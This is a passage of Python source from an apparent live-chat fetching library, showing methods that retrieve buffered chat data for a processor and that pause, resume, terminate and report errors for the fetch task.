            else:
                self._callback(processed_chat)

    def get(self):
        """
        Retrieves data from the buffer,
        throws it to the processor,
        and returns the processed chat data.

        Returns
             : Chat data processed by the Processor
        """
        if self._callback is None:
            if self.is_alive():
                items = self._buffer.get()
                return self.processor.process(items)
            else:
                return []
        raise exceptions.IllegalFunctionCall(
            "Callback parameter is already set, so get() cannot be performed.")

    def is_replay(self):
        return self._is_replay

    def pause(self):
        if self._callback is None:
            return
        if not self._pauser.empty():
            self._pauser.get()

    def resume(self):
        if self._callback is None:
            return
        if self._pauser.empty():
            self._pauser.put_nowait(None)

    def is_alive(self):
        return self._is_alive

    def _finish(self, sender):
        '''Called when the _listen() task finished.'''
        try:
            self._task_finished()
        except CancelledError:
            self._logger.debug(f'[{self._video_id}] cancelled:{sender}')

    def terminate(self):
        '''
        Terminate fetching chats.
        '''
        if self._pauser.empty():
            self._pauser.put_nowait(None)
        self._is_alive = False
        self._buffer.put({})
        self._event.set()
        self.processor.finalize()

    def _task_finished(self):
        if self.is_alive():
            self.terminate()
        try:
            self.listen_task.result()
        except Exception as e:
            self.exception = e
            if not isinstance(e, exceptions.ChatParseException):
                self._logger.error(f'Internal exception - {type(e)}{str(e)}')
        self._logger.info(f'[{self._video_id}] finished.')

    def raise_for_status(self):
        if self.exception is not None:
            raise self.exception